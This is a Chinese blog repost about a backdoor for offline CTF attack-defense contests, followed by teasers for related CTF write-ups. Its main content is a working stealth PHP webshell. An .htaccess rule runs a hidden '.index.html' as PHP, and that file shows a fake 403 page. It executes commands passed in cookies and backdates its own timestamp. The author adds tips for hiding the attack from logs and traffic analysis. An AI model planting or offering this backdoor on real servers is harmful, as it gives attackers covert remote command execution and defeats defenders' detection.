ctf_backdoor

最新推荐文章于 2023-12-22 23:12:17 发布
最新推荐文章于 2023-12-22 23:12:17 发布
阅读量873 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/iamstudy/articles/ctf_backdoor.html
版权

最近是想写一个ctf线下赛的总结,不过想想还是算了,然后突发想到一个能用上的一个backdoor

web容器:apache

.htaccess

<Files .index.html>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</Files>

DirectoryIndex .index.html

.index.html

<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
<!-- saved from url=(0023)http://c.cc/other/3.ico -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access <?php echo substr($_SERVER['PHP_SELF'],0,-11).""; ?> on this server.<br>
</p>

</body></html>
<?php
header('HTTP/1.1 403');
$file = __FILE__;
$e = @$_COOKIE['e'];
@register_shutdown_function($e, $_COOKIE['cmd']);
system("touch -c -t 05061803 ".$file);
?>

804631-20151205181320439-1235477455.jpg

修改了文件创建日期
利用cookie传值
利用.简单的隐藏文件
403的头(wireshark抓包和日志也会显示403的头)
htaccess把首页指定到.index.html,然后不加文件的访问

一直请求页面,加大日志和流量分析的难度,然后中间夹杂着后门攻击,这下就有得玩了。

转载于:https://www.cnblogs.com/iamstudy/articles/ctf_backdoor.html

dengzhasong7076
关注
Backdoor CTF 2013: Web 50
Gunther的博客
09-05 986
Web 50 最近开始接触了一个新网站(外文)   backdoor  ---------适合新手 题目: H4x0r在早期就做了一个认证系统。他显然觉得他拥有最先进的制度,但我们知道他实际上是多么辉煌。告诉他,成为管理员是多么容易。成为管理员后,您可以访问此链接获取标志。 提示:cookie 我是直接点击this link后, 在页面上打开chrom
back_doorctf_2013_bin_500
baidu_28138887的博客
08-17 645
0x0 前言 昨天看了一下backdoorctf2013 的bin500。一道vb题, vb不是很熟,大概就是一些关键的函数之类的。废话不多说了, 直接分析吧。对了题目的地址 0x1 Start 直接把bin丢 进IDA ,然后ida上全是hex ,看不懂,记得以前分析过的vb好像不是这样的,那么一定是做了相应的保护,或者本人太挫疏忽了什么。 不能静态分析那就只能动态了, 这货只
“百度杯”CTF比赛 十月场Backdoor(git泄露)
weixin_43610673的博客
03-22 800
访问/Challenges/.git 发现返回403 上GitHack 查看fiag.php源码 按经验flag就在这,猜测要版本回滚,访问/Challenges/.git/logs/HEAD 使用Git_Extract会自动解析提取这些commit 访问b4ckdo0r.php 尝试.b4ckdo0r.php.swo和.b4ckdo0r.php.swp 丢到kali中 用vim打...
Backdoor-CTF-Crypto-400.rar
09-30
Backdoor-CTF-Crypto-400.rar
Backdoor CTF 2013 :电子取证250
weixin_34289744的博客
09-20 132
0x00题目   h4x0r厌烦了你对他的城堡的所有攻击,所以他决定报复攻击你,他给你发来一封带有图片的邮件作为警告,希望你能找出他的警告消息:-) 消息的MD5值就是flag。   图片如下:    0x01解题   1.看题目得:从图片中找到警告信息,先用binwalk 查看一下,发现只有一个PNG图片,说明不是追加形式。(隐写术大致分为 追加数据和改写数据)     ...
2018年金融业ctf竞赛 backdoor 流量数据分析writeup
qq_42773814的博客
08-08 3504
Backdoor   flag:flag{b3c4r3fortheChinaChopperFHGJKUI^U%}   解题过程: 利用wireshark打开文件,过滤http报文,任意选择一个报文右键选择追踪流-&gt;http流 追踪流里面包含大量16进制代码,观察前几位发现它是zip压缩文件的文件头 将z1后面的参数复制下来 以16进制形式粘贴到C32asm工具里 ...
i春秋 “百度杯”CTF比赛 十月场 Backdoor
include_heqile的博客
09-20 2925
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;amp;r=0 这道题应该是我目前遇到的最有难度的一道题了,不过解题过程很有意思 首先还是进入题目链接,根据题目提示去查看网站目录下的敏感文件,我尝试了flag.php,但并未得到有价值的提示,然后我们再尝试一下敏感目录,当我在Challenges下输入.git的时候,出现了403 Forbidden错误,说明网站中存在...
CTF——MISC——流量分析
热门推荐
小锤队长的博客
09-26 2万+
目录 一、流量包修复 二、协议分析 三、数据提取 例题: 1,题目:Cephalopod(图片提取) 2,题目:特殊后门(icmp协议信息传输) 3,题目:手机热点(蓝牙传输协议obex,数据提取) 4,题目:想蹭网先解开密码(无线密码破解) 5,我的的教练也想打CTF 概括来讲在比赛中的流量分析有以下三个方向: 1、流量包修复 2、协议分析 3、数据提取 一、流量包修复 ...
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4398
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
ctf线下赛mysql密码_CTF线下赛writeup&tinyblog代码审计
weixin_33982454的博客
02-01 425
前段时间参加了某次CTF线下赛,大多数比赛都是采用主流CMS系统,比如wordpress、pgpcms、dedecms等等,如果对主流CMS漏洞比较熟悉的话可以迅速定位漏洞,发起攻击。而这次比赛采用了小众自写CMS的方式,注重现场快速代码审计。本文将介绍CTF线下赛AWD模式的一些常见套路,以及对tinyblog的代码审计思路。预留后门比赛开始,一般比赛方为了比赛的观赏性,一般都会预留后门,这样场...
Backdoor CTF 2013: 杂项 75-----定时求随机个素数之和
Gunther的博客
09-05 481
题目 打开传送门之后,题目要求在3秒内提交前N(随机个)素数的和。 re.findall(pattern, string):详细看 搜索string,以列表形式返回全部能匹配的子串。 r(raw)用在pattern之前,表示单引号中的字符串为原生字符,不会进行任何转义 +加号,指定将前面的RE重复1次或者任意多次,而且总是试图尽量多次地匹配。 re.findall(r'[a
[BackdoorCTF 2023] pwn
最新发布
weixin_52640415的博客
12-22 727
libc2.35 uaf, 格式化字符串o
2021年工业信息安全技能大赛CTF-03-msbackdoor的附件.zip
08-03
2021年工业信息安全技能大赛CTF-03
Backdoor CTF 2017: Fun Signals 做题笔记
fa1c4的blog
04-17 596
题目地址 没开保护机制, 只开了RWX权限 gef反汇编查看关键函数的程序 flag在服务器上的二进制文件里, 观察发现有两个syscall, 分别是RAX = 0x0和RAX = 0xf, 对应read函数和sigreturn函数. 为了读取flag, 直接调用write(1, &flag, 50), 调用号为0x1. 经典SROP打法. 起环境 socat tcp4-listen:10002,reuseaddr,fork exec:./funsignals_playe_bin from p
back_door__ctf2015 team
baidu_28138887的博客
08-18 827
0x0看分数是600分, 实际就是100的题目了。直接看题的0x1
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 689
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
i春秋 “百度杯”CTF比赛 十月场 web题 Backdoor
weixin_30375247的博客
10-21 716
0x00: 打开题目,题目中告诉我们这题是文件泄露。 0x01: 通过扫描目录,发现可以扫到的有3个文件 index.php flag.php robots.txt 但是浏览flag.php它告诉我们这不是真正的flag 又联系到题目文件泄露,于是测试.swp .swo .bak等备份文件后缀均无果。最后发现是.git泄露。 我们浏览这个url http://6...
CTF实战26 CTF题目练习和讲解四
qq_53058639的博客
03-17 2050
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
php漏洞靶场,CTF靶场训练-目遍历漏洞
weixin_32557949的博客
03-23 384
Background路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过槽中带有“点-斜线(..)” 序列及其变化的文件或使用绝对文件路径来应用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置或关键系统文件。 这种攻击也称为“点-点斜线”、 “目录遍历”、 “目录爬升” 和 “回溯” 。实验环境攻击机 kali linux : 10.0.2...
Backdoor CTF 2017:Fun Signals
qq_45540735的博客
08-22 214
例题来自2017年的Backdoor CTF。程序的保护机制全部关闭,并且有权限RWX的段。 程序分析 首先可以看到_start()函数里有两个syscall。第一个是read(0, $rsp, 0x400)(调用号0x0),它从标准输入读取0x400个字节到rsp指向的内存,也就是栈上。第二个是sigreturn()(调用号0xf),它将从栈上读取sigreturn frame。所以我们就可以伪造一个frame。 flag其实就在二进制文件里,读取它需要一个write(1, &fl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值